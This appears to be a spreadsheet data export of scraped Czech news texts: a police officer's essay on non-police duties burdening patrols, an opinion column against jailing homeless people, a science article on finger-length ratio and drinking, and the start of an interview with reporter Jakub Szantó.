nejedná o trestný čin ani přestupek (např. i vyšší moc). On je ten důvod vlastně jednoduchý. Policie vyjede na místo, vše zadokumentuje a vyfotí. Pojišťovna už má vše připravené na zlatém podnose a zdarma. Proč by na místo posílala likvidátora, kterého by musela platit. Pokud se nenajde vůle proti tomuto nějakým způsobem zakročit, pojďme to pojišťovnám alespoň zpoplatnit, ať se rozpočet policie alespoň trochu zlepší. Ono by to asi nebylo jen trochu. Pojišťovny považuji za největší zátěž policie v současné době. Já jsem to chtěl vyřešit s pojišťovnou, ale mě k vám poslali, že to musím nahlásit i policii – to je asi nejčastější věta, kterou slýcháme. Požadavky na výjezdy k pojistným událostem, které nejsou pro policii, musí řešit ta jedna autohlídka, která je na celý obvod sama. Exekutoři Další extrémní zátěž. Bývaly doby, kdy exekutor někoho sháněl, tak se zeptal policie. Policie zase poslušně šla, provedla šetření (kde bydlí, kde pracuje, kolik bere, atd.) a to se exekutorovi zaslalo (O tehdejších odměnách exekutorů se toho napsalo hodně, přitom většinu práce zvládla policie.). Pak se konečně někdo probral a takový postup zarazil. Nyní se odepisuje buď to, že na takové informace nemá oporu v zákoně (když chce někde šetřit), případně někde se přistupuje k tomu, že se poskytují informace z dostupných evidencí policie (dle zákona). Domnívám se, že i to je špatně. I když se odepisuje, že nemá nárok, posílají exekutoři desítky dotazů měsíčně, což je pro každý útvar policie obrovská administrativní zátěž. Na každou žádost se musí odpovědět, takže ke každé žádosti musí sednout policista a napsat odpověď. Stejně jako u pojišťovny – zarazit, nebo zpoplatnit + najít pro exekutory jiné řešení. Soudy V tomto odstavci začnu trochu od konce. Policejní práci, práci soudů i dalších orgánů veřejné moci extrémně zdržuje a prodražuje jedna věc – hledání osob a doručování písemností. Neexistuje žádná povinnost mít adresu, na které si budu přebírat poštu, což je svým způsobem velice problematické. Chápu, že spoustě lidem byť jen taková myšlenka zvedá tlak. Nicméně stejní lidé si pak stěžují, jak se vleče jakékoliv řízení (soudní, správní, trestní, dědické, atd.). Jak jsem již uváděl – všechna řízení to zdržuje a prodražuje. Tento ztracený čas (zbytečně proplacená pracovní doba úředníků, policistů, soudců, atd.) bude za celý rok v celé republice vytvářet celkový účet v řádech miliónů, možná až jednotek miliard. V nedávné době měla být zřízena datová schránka všem fyzickým osobám. Nakonec z toho raději vycouvali (asi aby to nesnížilo volební šance). Znovu říkám – chápu, že pro někoho je to ožehavé téma, nicméně se domnívám, že kdyby se to lidem řádně vysvětlilo, nebylo by tolik lidí proti. Už by se nemohlo stát, že někomu „uteče“ nějaký důležitý dopis. Zároveň mi přijde komické, že někdo argumentuje počítačovou gramotností, když ¾ obyvatel ČR pravidelně užívá internet a 62 % pravidelně navštěvuje sociální sítě. Vydání občanského průkazu v 15 letech = zřízení datové schránky. Nehledejme důvody, proč to nejde. Hledejme způsob, jak to udělat správně a řešit problém. No a toto celé vede k tomu, že policie je zahlcena písemnostmi od soudů, které soudy chtějí doručit, aby mohly pokračovat v řízení. Samozřejmě se jedná i o další orgány veřejné moci. I zde pozoruji, že se hraje o peníze. Od nás (policejního orgánu) dorazí na soud spis, ve kterém je vedeno 8 osob (podezřelý + poškozený + svědci). Soud jim všem potřebuje doručit písemnost. Už se ani neobtěžuje (nebo si některé věci neumím vysvětlit) poslat poštou. Jen je v žádosti uvedeno, že prostřednictvím pošty se nepodařilo doručit. Přitom jsou to lidé, kteří bydlí stále na stejné adrese a poštu si přebírají. Mezi policii a poštou je jeden zásadní rozdíl – cena. Policii se doručí jedna obálka, ve které je osm písemností pro 8 osob, takže platí poštovné za jednu obálku. Zbytek písemností už policie doručí zdarma. Když to budou posílat poštou, musí zaplatit 8x poštovné. V současné době musí ta jedna již mnohokrát zmíněná autohlídka každý měsíc doručit desítky písemností, což je opět zdržuje od důležité policejní práce. Velmi často se také stává, že soudu (či jinému orgánu veřejné moci) sdělíme, kde se osoba zdržuje a přebírá si poštu a stejně další obálka je adresována na špatnou adresu a má ji doručit policie. Další kapitolou je předvádění osob před orgány veřejné moci. Nezřídka se stává, že v odpoledních hodinách vypátráme osobu v celostátním pátrání, která má být předvedena k soudu. Ačkoli každý soud má zajištěn dosahového soudce, prakticky vždy jsme požádáni o předvedení až v dopoledních hodinách následujícího dne (v pracovní době). Tudíž osobu do té doby střežíme a vážeme na tento úkon lidské zdroje. Kapitolou samotnou jsou pak předvedení před soudce klidně napříč celou republikou, kdy osobu policie eskortuje k tomu, aby jí soudce předal předvolání k jednání a následně osobu obratem propustil. Úkon, který by mohl vykonat soud v místě vypátrání osoby, pakliže by soudci byli ochotni opustit argumentaci, že osoba má nárok na „svého místně příslušného soudce“. Místně příslušný soudce rozhodne ve věci samotné. Jeho předvolání snad může provést kdokoliv. Jsou to tisíce zbytečných kilometrů ročně. Také se velmi často stává, že se jeden konkrétní den projednává nějaká obsáhlá věc a přijde žádost o předvedení třeba 6 osob. Na předvedení jedné osoby je třeba 2 policistů, takže na 6 osob je třeba 12 policistů. To úplně matematicky nevychází, když máte v práci policisty dva. Když nedojde k předvedení osob v požadovaném termínu, je stanoven náhradní termín a předvádíte je po jednom, na každý termín přivedete jednoho (pokud je zrovna čas a daří se). Ještě jedna věc je od soudů naprosto zatěžující – desítky dotazů měsíčně v civilních věcech (občanskoprávní spory). Nemá to oporu v zákoně a policie nemůže provádět požadovaná šetření. I tak chodí stále dotazy. Na každou žádost musí policie odpovědět, takže policista opět ztrácí čas nesmyslnou administrativou. Předvádění osob pro OSSZ – policisté obvodních a místních oddělení v poslední době řeší zvýšený počet žádostí Okresní správy sociálního zabezpečení (OSSZ) o předvedení občanů, kteří si neplní povinnosti v sociálním zabezpečení a nedostavují se na výzvu ke kontrole na OSSZ. Protože musí eskortovat tyto občany na OSSZ do okresních měst, chybí tak na místech, kde by byli potřebnější. Těmto osobám rovněž hrozí vymáhání nákladů nutných k jejich předvedení k uvedené instituci, které mnohonásobně převyšují částku, kterou by zaplatili za vlastní dopravu. Povinnost k součinnosti vyplývá ze zákona. Proto by bylo vhodné iniciovat změnu zákona, nebo alespoň vejít ve styk s tímto úřadem a zajistit, aby institut předvedení ze strany PČR byl užíván „ultima ratio“, tedy teprve tam, kde jiné možnosti selhaly. Advokáti Velmi často se setkáváme s tím, že někdo přijde „podat trestní oznámení“. Hned na začátku je upozorněn, že se zcela zřejmě jedná o občanskoprávní spor (Jenže policie oznámení přijmout musí, a protože není v policejním vedení opora v tom, abychom takové věci nepřijímali nebo ihned zakládali bez opatření, šetříme.). Tato osoba přizná, že se s věcí obrátila na advokáta, který ji poslal na policii. Ano, je to zase velmi jednoduché. Policie zcela zdarma zjistí kontakty na dotčené osoby a jejich výpověď k celé věci. Advokát má pak velmi usnadněnou práci, za kterou si nechá dobře zaplatit. Základní školy V poslední době mi připadá, že na každé základní škole v našem městě (a není to problém jen v našem městě) mají někoho, kdo je zaměstnán jen na to, aby podával oznámení na policii. Dva žáci se pohádají a nadávají si (klidně v první třídě)? Oznámení na policii. Dva žáci se napadnou (žádné zranění, jen drobná strkanice)? Oznámení na policii. Nějaká lumpárna, kterou by ještě nedávno vyřešila poznámka? Oznámení na policii. Určitě jsou věci, které za oznámení stojí. Nicméně i zde platí „ultima ratio“. Jsou jiné postupy a jiné instituce, které by toto měly řešit. Taky je důležité to, že jsou to děti (nezletilí do 15 let), takže policie má hodně „svázané ruce“. S veškerou úctou musím konstatovat, že mi to přijde jen jako alibismus od ředitelů škol (případně jejich nadřízených). Dětské domovy Dětský domov v rajónu obvodního (místního) oddělení je taková malá noční můra. Několikrát měsíčně vyhlašujete pátrání, protože se někdo nevrátil z vycházky, z víkendu u příbuzných, prostě odkudkoliv. Jsou případy, kdy problémového jedince vyhlašujeme do celostátního pátrání i třeba 15x za měsíc. A postup je vždy stejný. Výslech oznamovatele, sepsání posledního oblečení, s kým se stýká, kontakty, prověrky v nemocnicích, apod. Šetření po městě a okolí. Vše zabere strašně času a extrémní množství administrativy. No a pak se dotyčný nad ránem vrátí s tím, že chtěl jen „zapařit“ s kamarády. Nebo se vrátí po víkendu, který chtěl strávit s kamarády na chatě. Já v tomto případě nevím, jak z toho ven, nicméně se domnívám, že současné nastavení fungování dětských domovů (alespoň dle toho, s čím se setkáváme), není dobré a opět to extrémně zatěžuje policii. Pro úplnost ještě doplním, že každému oznámení se vždy věnujeme s maximálním nasazením, jako kdyby to bylo poprvé, co se nevrátil. Nechceme nechat žádné dítě v nesnázích (v jiných případech ani dospělého). V této souvislosti jeden dodatek, který lehce souvisí, ale je i velmi zásadní jako celek. Je mi jasné, že „odborníci“ a „ochránci lidských práv“ budou kolabovat, ale pojďme se bavit o snížení hranice trestní odpovědnosti. Doba se velmi posunula, dnešní děti se vyvíjejí úplně jinak, než tomu bylo v době, kdy došlo k nastavení současného stavu. Zároveň je celý systém nastavený trochu prapodivně (subjektivním pohledem). Systém je nastaven tak, že připouštíme pohlavní styk od 15 let, ale volit může občan až od 18 let. Při pohlavním styku si člověk může ovlivnit celý život, při volbách jen na 4 roky. Přísným pohledem člověka, který se pravidelně setkává s problematickou mládeží a dětmi, bych řekl, že se doba posunula tak, aby se trestní odpovědnost posunula o celé tři roky a přenastavil se tak celý systém. Děti by měly být v omezené míře trestně odpovědné již od 12 let, ve zvýšené od 15 let a od 18 plná odpovědnost. Setkávám se s tím téměř denně. Moc dobře vědí, co dělají a ještě lépe vědí o své nedotknutelnosti. Jen my pořád máme potřebu je chránit a omlouvat. Není to dobře. Kulturní a sportovní akce Před lety systém fungoval tak, že když se hrálo problematické utkání, byla nasazena policie a byla přítomna i na stadionu. Pak někdo „moudrý“ přišel na to, že je to soukromá akce, takže by do toho policie neměla zasahovat. Jenže už se to nedotáhlo, takže policie nyní čeká venku před stadionem a pokud to pořadatelská služba nezvládá, dojde k policejnímu zákroku. Stejně jako je to v mnoha jiných případech, je to takový kočkopes + někdo si mastí kapsu a policie zase pracuje zdarma (zdarma dělá bezpečnostní agenturu). Jde o dvě věci. Prvním problémem je to, že když nemáte přehled o tom, co se na stadionu děje, provádí se zákrok mnohem hůře (nemáte tušení, co vás čeká). Přítomnost policie také působila dost preventivně. Druhým problémem je, že pořadatelé sportovních a kulturních akcí pořadatelskou službu moc neřeší (je drahá, policie zdarma). Moc dobře vědí, že kdyby se to náhodou nějakým způsobem zvrhlo, policie to vyřeší. Téměř u každého utkání a kulturní akce, kde je předpoklad většího počtu oso, je přítomna policie, takže to stojí stovky milionů ročně a stále to nikdo neřeší. Tohle není jen o nastavení policie, tuto situaci je třeba řešit systémově. Podstav je u policie úplně všude, sportovních a kulturních událostí je mnoho a policie má prázdnou kasu, takže teď je situace taková, že mám vysílat policisty (pořádková jednotka) do jiných měst (především krajské město) z fondu pracovní doby (žádné přesčasy), takže ten žalostný stav (1 autohlídka) ještě prohlubujeme a opět nás tlačí do toho, abychom ještě víc slučovali rajóny. Pořádková jednotka (těžkooděnci) se staví na všechna utkání. Nad rámec toho po mně chtějí, abych ještě posílal 4 policisty měsíčně na výpomoc do krajského města na vybraná sportovní utkání. Když argumentuji tím, že prostě nemám, protože když je pošlu, nebude mít v okresním městě kdo sloužit, dostanu odpověď, že prostě musím. Pro úplnost ještě doplním, že je jasné, že u většího shromáždění lidí by měla policie být přítomna vždy, určitě je ale nesmysl, aby byla vždy přítomna ve stovkách. Přiznejme si, že to také vychází z toho, že se všichni bojí o svá místa (v horních patrech policie), takže pokud by na jedno konkrétní utkání snížili počet přítomných policistů a situace by se zvrtla, mohlo by se to otočit proti nim (novinář a sociální sítě neodpouštějí – a jsou dnes nejdůležitější). Soukromé bezpečnostní agentury Pokud máte objekt, který chcete zabezpečit, můžete se obrátit na bezpečnostní agenturu, která provozuje tzv. PCO. S bezpečnostní agenturou uzavřete smlouvu. Agentura do vašeho objektu nainstaluje zabezpečovací techniku, kterou připojí ke své centrále. Pokud někdo neoprávněně vnikne do vašeho objektu, spustí se v centrále agentury alarm a dle smlouvy by agentura měla vyrazit na místo. Problém je, že se v praxi setkáváme s agenturami, ve kterých pracuje jedna jediná osoba. Jakmile se spustí alarm (a planých poplachů je skutečně hodně), obrátí se tento jediný pracovník na policii. Policie na místo vyjede, objekt zkontroluje a předá „oznamovateli“ informaci, jak to na místě vypadá. Tato „bezpečnostní agentura“ dostane zaplaceno za výjezd (i víckrát za měsíc) + měsíční paušál, práci přitom odvedla policie. Požáry Představte si, že jedete někam autem. V průběhu jízdy se z motoru začne valit dým. Zastavíte a odejdete do bezpečné vzdálenosti. Samozřejmě vytočíte tísňovou linku. Přijedou hasiči a policie. Hasiči hasí, policie zabezpečuje prostor. Požár je uhašen, vozidlo je na odpis a je odtaženo – silnice je plně průjezdná. Ačkoliv už na místě nehrozí žádné nebezpečí, policie na místě zůstává. Proč? Stejně jako u jiných požárů (např. zahoření komína, požár kontejneru, atd.), u kterých je zřejmé, že nedošlo k trestnému činu ani přestupku, musí policie věc zadokumentovat (úřední záznam, fotodokumentace, atd.). Nikdo mi není schopný vysvětlit, proč tomu tak je. Asi jen další dokumentace pro pojišťovnu, případně pro vyšetřovatele hasičů. Pojišťovna i vyšetřovatel to mají bez práce a zdarma – jen si dokumentaci vyžádají. Absurdní mi to přijde i např. u požáru kontejneru. Na místo dorazí hasiči i policie. Situace stejná – hasiči hasí, policie zabezpečuje prostor, aby vše proběhlo bez úrazu a další škody na majetku. Je uhašeno, hasiči odjíždí. Před odjezdem sdělují, že požár mohl vzniknout samovznícením, něčí nedbalostí i úmyslně (já to naprosto chápu, vaří z vody, nemají nic, čím by mohli argumentovat). Na závěr doplní, že požáry kontejnerů vůbec neřeší, takže po policii ani nic nechtějí. A policie zase dokumentuje a šetří. Nikdo neví, jak k požáru došlo a ani se to nezjišťuje, ale policie šetří. Pokud se např. jedná o samovznícení, nejedná se trestný čin ani přestupek a policie i tak šetří. Absolutně to nedává smysl a je to další úplně zbytečná administrativa. Zde bych chtěl upozornit na dvě zásadní věci: 1. Znám spoustu hasičů a mám mezi nimi mnoho přátel, nemají to jednoduché a jsou ve stejné situaci jako my – chybějící prostředky i podstav. Tento odstavec není v žádném případě útokem na hasiče, je to další popis nesmyslného nastavení policejní činnosti a spolupráce. 2. Bavím se zde o požárech, jako jsou technické závady, nezjistitelné důvody vzniku požáru, atd. Pokud někdo něco evidentně zapálí (úmyslně i z nedbalosti), je šetření policie na místě. Pracovní úrazy Je to stejné jako u požáru. Pokud např. někdo někoho v práci přejede vysokozdvižným vozíkem a způsobí mu tak zranění, je šetření policie na místě (podezření z přestupku či trestného činu). Pokud sám sebe někdo v práci řízne, spadne ze žebříku, poleje se vroucí vodou, atd., nechápu, proč to policie eviduje a šetří. Zase je to jen práce pro někoho dalšího (Oblastní inspektorát bezpečnosti práce) – pak si jen vyžádají dokumentaci (úřední záznamy a fotodokumentaci) a mají to bez práce a zdarma. Přitom se domnívám, že by to mělo být obráceně. Na místo by měl především vyrazit pracovník inspektorátu a případě na místo zavolat policii. Opět zatěžujeme policii něčím, co prostě nespadá do její činnosti. Věřte, že úrazů je víc, než si myslíte. Náhlá úmrtí Pojďme se nejdříve podívat na postup v minulosti. Již druhý den se nemůžete dovolat babičce. Je to divné, telefon nezvedla, jen když spala, ale jakmile probudila, zavolala zpět. Nyní nic. Jede k bytu, zvoníte – nic. Zkoušíte odemknout, jenže to nejde, protože zevnitř je zastrčený klíč. Zavoláte na tísňovou linku. Dorazí policie, hasiči, záchranka. Byt se otevře. Bohužel, babičce už není pomoci. Lékař ze záchranky vypisuje úmrtní list. Vyrozumí se pohřební služba, která tělo babičky odváží. Na místě je vše hotovo a všichni odjíždějí. Dnešní situace je jiná. Velmi často se stane, že po zavolání na tísňovou linku dorazí jen hasiči a policie. Byt se otevře. Bohužel, babičce už není pomoci. Pokud je to případ, kdy je na místě lékař ze záchranky, vyrozumí koronera. Pokud na místě není lékař, vyrozumíme si ho sami. Lékař ze záchranky už nic nepíše, pokud dané osobě není pomoci a z místa odjíždí. Já to chápu, lékař musí být k dispozici pro jiné výjezdy. Jenže to i policie. Bohužel praxe je taková, že je vyrozuměn koroner, hasiči odjedou, záchranka odjede (pokud tam je) a vše zůstane na policii. Nebyl by to až takový problém, jenže systém (smlouva) je nastavená tak, že není žádný dojezdový čas, žádná povinnost pro koronera, takže se běžně stává, že hlídka na místě čeká na koronera dvě, tři i čtyři hodiny (v některých případech i déle). Takové nastavení by bylo špatné za všech okolností, v současných podstavech je to naprosto strašné. V této souvislosti ještě dvě doplnění: 1. Může se vám stát, že když operátor záchranky vyhodnotí, že už osobě nelze pomoci, rovnou vyrozumí koronera a záchranka na místo nejede. Ať už se jedná o osobu v bytě, na volném prostranství, nebo kdekoliv. 2. Je zajímavé, jak to vlastně nemá žádná pravidla (nejen koroneři). Dejme tomu, že ve městě denně zemře 10 lidí. Úplnou náhodou (např. Osoba, která zemřelého nalezla, nejdříve vytočí 158.) se policie dozví o 2 úmrtích, kde policie zuřivě fotí, dokumentuje, šetří, atd. Co zbývajících 8 úmrtí? O těch se policie nedozvěděla, takže je to v pořádku a nedošlo tam k protiprávnímu jednání. Chápejte, nejde mi o to, aby policie šetřila všech 10 úmrtí. Naopak! Mělo by to být tak, že koroner bude mít jasně stanovená prav</t>
  </si>
  <si>
    <t>12550</t>
  </si>
  <si>
    <t>13920</t>
  </si>
  <si>
    <t>20241201_10_3479396787_d1a32f543ceda6211a6b.html</t>
  </si>
  <si>
    <t>d1a32f543ceda6211a6b</t>
  </si>
  <si>
    <t>Slavné bezdomovce taky zavírat, nebo jenom ty anonymní, pane Hrabo?</t>
  </si>
  <si>
    <t>Slavné bezdomovce taky zavírat, nebo jenom ty anonymní, pane Hrabo? Letmo jsem se dozvěděl, že pan Hraba, který už má coby senátor zřejmě nahrabáno, by chtěl posílat bezdomovce do kriminálu. Detaily jeho zvrhlého návrhu radši ani studovat nechci. A to je prý tenhle Hraba křesťan. Hnus, velebnosti! To, že je někdo momentálně na dně a optikou pana Hraby viděn jako odpad společnosti, automaticky ještě neznamená, že je i odpadem lidským. Mou optikou jsou lidským odpadem spíše ti, kteří navrhují kriminalizovat bezdomovce. Jestlipak, pane Hrabo, víte, kolik bezdomovců, kteří někdy ochutnali krabičák v parku na lavičce, toho dokázalo mnohem více než vy svým dobře placeným tlacháním ve zbytečné instituci zvané Senát? Takový Václav Kozák například vyhrál olympiádu ve veslování a žil pak několik let na ulici, než ho rodina ze srabu vytáhla. Veleúspěšný režisér David Vondráček má za sebou také několik bezesných nocí na toaletách hlavního nádraží. Zpěvák Petr Muk se jeden čas potuloval po Praze a v kapse neměl ani jeden frank. Věděl jste, nemilý pane Hrabo, že Dostojevskij byl gambler, který kradl peníze na domácnost své manželce, bez jejíž pomoci by pravděpodobně skončil jako bezdomovec? Věděl jste, že Ken Kesey , autor slavného Přeletu nad kukaččím hnízdem, uvízl v lochu i přesto, že už byl uznávaný spisovatel? Věděl jste, že Tomáš Baťa , který si létal na pracovní obědy soukromým letadlem z vlastního letiště, a při jednom takovém letu bohužel tragicky zahynul, se o své lidi uměl postarat asi milionkrát lépe než brněnský hodnotový kanonýr Messi a celá ta jeho parta? Pane Hrabo, n ikdy jste neslyšel o tom, že jednou z častých příčin bezdomovectví je psychická porucha? Chtěl byste psychiatrické pacienty taky posílat rovnou do basy? Já bych, na rozdíl od vás, mnohem raději zavíral za katr nestoudné lživé politiky, kteří společnosti také nic nepřinášejí, jenom berou a navrch ještě obtěžují smradem a špínou svých kšeftů. Mezi bezdomovci jsem poznal řadu chytrých a schopných lidí. Nebo i takového, který z příspěvku na živobytí dobíjel kredit svému synovi, kterého kvůli exmanželce X let nemohl vídat. Místo toho, aby dobře zaopatřený dospělý synek pomohl tátovi v nouzi, to bylo přesně naopak. Ono je to totiž docela záhul, když po rozvodu přijdete o všechno. A dost těchto lidí se pak stydí vůbec říct si někomu o pomoc, nebo svůj držkopád dokonce tají i před těmi nejbližšími. Až se jednoho dne dostanou za bod zlomu, ze kterého již není návratu. I když máme celou řadu nástrojů, jak bezdomovcům pomoci, i takový měsíc na ulici v zimě (kvůli přeplněnému azyláku) je vás schopen morálně zdevastovat natolik, že už si pak v životě ani neškrtnete. Respektive leda tak zapalovačem, abyste si zapálil cigaretu ubalenou z vydrolených vajglů. Oblíbená mantra lidí pohrdajících bezdomovci zní, že kdo chce, práci si vždycky najde. Tímto je pro černobíle uvažující jedince problém vyřešen. Otázkou ovšem zůstává, jestli bude vůbec někdo ochoten zaměstnat bezdomovce. Protože bezdomovectví se vám velmi brzy tak propíše do tváře a sebevědomí, že i kdyby vám na charitě dali ty nejlepší šaty a vykoupali vás v šamponu od Diora, na pracovním pohovoru se beztak budete klepat jako ratlík. Také dost záleží na tom, jestli na ten pohovor přijdete ve třiceti nebo třeba v šedesáti, že? Jakousi „záhadou“ nám totiž překotně přibylo bezdomovců, kteří se jimi stali až v seniorském věku, když předtím celý život domov měli. To asi zrovna nesvědčí o tom, že vegetovat na ulici je jejich celoživotní koníček a volba. Na stará kolena skončit na dlažbě z vlastního rozhodnutí nechce nikdo. Máme snad i tyto důchodce pozavírat namísto do domovů pro seniory raději do lapáku, pane Hrabo? Nebyla by pro ně rovnou lepší eutanázie? To by totiž vyšlo ještě levněji a bylo by to z hlediska odstranění problému ještě efektivnější. Další věcí je, že bylo zjištěno, že pokud se práce nepojí zároveň se střechou nad hlavou, tak ti lidé si ji nemají šanci udržet. Že to jako zkrátka moc dobře nefunguje chodit někam na dvanáctku do kolbenky zpod mostu, kde vám co chvíli šlohnou mobil, který potřebujete jako budík. Existují zaměstnavatelé, kteří ani nepřijmou člověka, pokud například nemá funkční bankovní účet, neboť mzdu v hotovosti prostě nevyplácejí. Jenže lidé na ulici zpravidla mívají bankovní konta obstavena exekucemi. Nástroje proti bezdomovectví jsou jedna věc, ale praxe je věc druhá. Já nevěřím tomu, že existuje příliš mnoho bezdomovců, kteří to mají jako životní styl, co jim vyhovuje. Spousta z nich si nepřeje nic jiného, než žít zase normálně, zvlášť teď v období Vánoc. Jenže tohle je běh na dlouhou trať, který bez pomoci nemusí zvládnout ani bývalý olympionik. Jenže to vy, pane velmi zvláštní křesťane Hrabo, asi nikdy nemůžete pochopit, když kážete vodu, ale přitom jste nikdy neochutnal krabicové víno . Když si totiž poprvé ustelete na ulici a dojde vám, že jste to definitivně projel, je to taková darda bezmoci, kterou si většina chytráků se snadnými recepty na všechno ani nedovede představit. Dostat se z toho samozřejmě lze, ale musí vám někdo pomoct, nesmíte mít podlomené zdraví a musíte mít taky zatracené štěstí. A samozřejmě potřebujete taky koňskou dávku vůle, tu si ale v kriminále nevypěstujete, že? Tam se možná naučíte, jak si z žiletek a drátu vyrobit varnou spirálu, nebo z chleba šachy, ale rozhodně tam nezískáte pracovní návyky nebo sebeúctu v míře potřebné pro neparazitický způsob života. Vím o mnohem větších parazitech v tomhle státě, než jsou bezdomovci, pane Hrabo, a tihle paraziti škodí světu nesrovnatelně víc. A ty já bych všechny bez milosti nahnal do kriminálu třeba hned zítra. A to byste pak možná zíral, jak rychle by ubylo vágusů v ulicích. Říká vám něco pojem pracující chudoba? Možná jste o ní v senátní kantýně mezi chutným dotovaným obídkem, kávičkou a zákuskem už někdy slyšel. Tak otevřte svůj služební noťas, který máte pořízen mimo jiné z daní vybraných na této pracující chudobě, a zjistěte si, kolik neparaziticky žijících lidí se dnes potýká s tak velkými existenčními problémy, že se z nich klidně zanedlouho mohou stát bezdomovci. Pardon, vlastně kriminálníci, abych vyhověl vašemu slovníku a způsobu uvažování. 01.12.2024 Pohy</t>
  </si>
  <si>
    <t>4930</t>
  </si>
  <si>
    <t>20241201_100_3477189604_98d9b7a51a76953c1685.html</t>
  </si>
  <si>
    <t>98d9b7a51a76953c1685</t>
  </si>
  <si>
    <t>Láska k alkoholu začíná před narozením. Sklony k nadměrnému pití může prozradit délka prstů</t>
  </si>
  <si>
    <t>Láska k alkoholu začíná před narozením. Sklony k nadměrnému pití může prozradit délka prstů Diskuze (8) Zdá se, že tajemství alkoholických preferencí možná nespočívá jen v chuti či rodinných zvyklostech, ale přímo a doslova ve vašich rukou – konkrétně v délce prstů. Nejnovější vědecký výzkum odhalil, že poměr délky ukazováčku a prsteníčku může být klíčem k pochopení toho, jak často saháte po skleničce. Tento poměr, označovaný jako 2D:4D, ukazuje poměr délky ukazováčku (2D) k prsteníčku (4D). Vědci zjistili, že lidé s delším prsteníčkem vůči ukazováčku – tedy nižším poměrem 2D:4D – byli před narozením vystaveni vyšším hladinám testosteronu. Naopak vyšší poměr signalizuje větší vliv estrogenu. A právě tyto hormonální rozdíly mohou mít vliv na chování v dospělosti, včetně náklonnosti k alkoholu . Co prozrazuje délka prstů? Studie provedená na 258 univerzitních studentech v Polsku a Velké Británii ukázala, že lidé s nižším poměrem 2D:4D konzumují více alkoholu . Zajímavé je, že tento vztah byl výraznější u mužů a při měření prstů na pravé ruce, což může naznačovat větší citlivost pravé strany těla na hormonální vlivy v děloze. Vědci použili k určení délky prstů přesná měřidla a výsledky porovnali s dotazníkem AUDIT (Alcohol Use Disorders Identification Test), který hodnotil rizikové návyky související s konzumací alkoholu . Účastníci byli rozděleni do pěti kategorií od abstinentů až po ty s možnou závislostí. Zajímavostí je, že jen 46 % mužů mělo nízké riziko, zatímco u žen to bylo až 75 %. Zjednodušeně řečeno studie tedy ukazuje, že lidé s delším prsteníčkem vůči ukazováčku (nižší poměr 2D:4D) byli v děloze vystaveni vyšším hladinám testosteronu, což může souviset se zvýšenou konzumací alkoholu v dospělosti. Neznamená to ale, že každý člověk s takovým poměrem bude automaticky pít víc nebo se stane alkoholikem. Jde o statistický trend v rámci skupiny, nikoliv o přesnou prognózu pro jednotlivce. Na konzumaci alkoholu má vliv celá řada dalších faktorů, jako jsou genetika, prostředí, výchova nebo osobní rozhodnutí, takže délka prstů je jen jedním z mnoha kousků této složité skládačky. Může za to testosteron Zásadní myšlenka spočívá v tom, že testosteron může ovlivňovat nejen chování, ale i schopnost těla zpracovávat alkohol . Mužské tělo má enzymy, které redukují absorpci alkoholu v žaludku až o 30 %, zatímco u žen se do krevního oběhu dostává více alkoholu . Tento biologický rozdíl může vysvětlovat, proč muži obecně konzumují více alkoholu než ženy. Výsledky studie naznačují, že prenatální expozice testosteronu může ovlivňovat návyky spojené s alkoholem . Autoři ale zároveň zdůrazňují, že nejde o jednoznačnou předpověď – v konečném důsledku hrají klíčovou roli další vlivy, jako je genetika, prostředí a osobní rozhodnutí. Vědci doufají, že jejich závěry pomohou lépe porozumět faktorům, které vedou k alkoholismu. Ačkoli studie zatím zahrnovala pouze studenty, plánují další výzkumy, které by mohly potvrdit příčinnou souvislost mezi prenatálními hormony a návykovým chováním. I když tedy délka prstů může něco napovědět o vašich sklonech k alkoholu , není to osudové znamení. Jak poznamenal profesor John Manning , naše rozhodnutí o tom, zda si dáme další skleničku, držíme v téměř jakémkoli okamžiku pevně ve svých rukou. Vědecké bádání s výhradami Ačkoli tato studie přinesla zajímavé poznatky o vztahu mezi délkou prstů a konzumací alkoholu , má několik významných omezení. Prvním problémem je příliš úzký vzorek respondentů – studie zahrnovala pouze 258 univerzitních studentů, což je specifická skupina s omezenou věkovou i sociální rozmanitostí. Studenti navíc nebývají reprezentativní vzorkem celé populace, pokud jde o zvyklosti v konzumaci alkoholu . Dalším nedostatkem je nepoměr mezi počtem mužů a žen, což mohlo ovlivnit spolehlivost srovnání mezi pohlavími. Zahrnutí pouze zdravých jedinců bez závažných problémů s alkoholem také omezuje generalizaci výsledků na osoby s již rozvinutou závislostí. Další otázky vyvolává metodologie. Přestože je poměr (2D:4D) považován za biomarker hormonální expozice během těhotenství, jeho přesnost coby ukazatele prenatálního testosteronu a estrogenu je předmětem odborných debat. Studie navíc nezohledňuje další faktory, které mohou ovlivňovat konzumaci alkoholu , jako jsou kulturní zvyklosti, rodinné prostředí či genetická predispozice. Výsledky vědeckého bádání byly publikovány 11. listopadu v odborném časopise American Journal of Human Biology. Toto periodikum pokrývá širokou škálu témat, od evoluční biologie, fyziologie a genetiky až po behaviorální studie, zdravotní problematiku a vztah mezi biologií a prostředím. Je známé svým přísným recenzním řízením, které zajišťuje vysokou kvalitu publikovaných studií. Zdroje: onlinelibrary.wiley.com, studyfinds.org, scienceblog.com, sciencedaily.com. Autor: Karel Kilián Autor Karel Kilián</t>
  </si>
  <si>
    <t>22220</t>
  </si>
  <si>
    <t>24270</t>
  </si>
  <si>
    <t>20241201_101_3479507249_9991fdcbb1f8bbf188e7.html</t>
  </si>
  <si>
    <t>9991fdcbb1f8bbf188e7</t>
  </si>
  <si>
    <t>Při pesachu jsou v Izraeli kvašené výrobky zablokované na kase, v Česku by to byl útok na osobní svobodu, popisuje Szantó</t>
  </si>
  <si>
    <t>Při pesachu jsou v Izraeli kvašené výrobky zablokované na kase, v Česku by to byl útok na osobní svobodu, popisuje Szantó Domácí Jakub Szantó je odborníkem na Blízký východ , reportérem České televize i spisovatelem. Foto: Agro Brno - Pět let byl zahraničním zpravodajem v České televizi na Blízkém východě - o ten se zajímá více než čtvrt století. Jakub Szantó je držitelem několika ocenění včetně Ceny Ferdinanda Peroutky nebo Novinářské ceny. Napsal dvě knihy s názvem Z Izrastiny s láskou a Za oponou války. Jakub Szantó měl ve čtvrtek 28. listopadu v Brně přednášku s názvem Mezi mlýnskými kameny, kde mluvil o konfliktu mezi Izraelem a Palestinou , historii těchto států nebo o svých osobních zážitcích. Vy jste momentálně zahraniční reportér České televize. Jak moc se tato práce kromě pobytu v cizí zemi liší od práce zahraničního zpravodaje? Člověk, co je na postu zahraničního zpravodaje, to znamená reportér na dlouhou dobu vyslaný někam do zahraničí, si agendu určuje a priori sám. Záleží na tom, v jakém regionu je. Pokud je člověk v Bruselu , tak je to trošičku jiný, protože dneska je evropská politika součástí té domácí, tak je větší napojení na ty domácí věci. 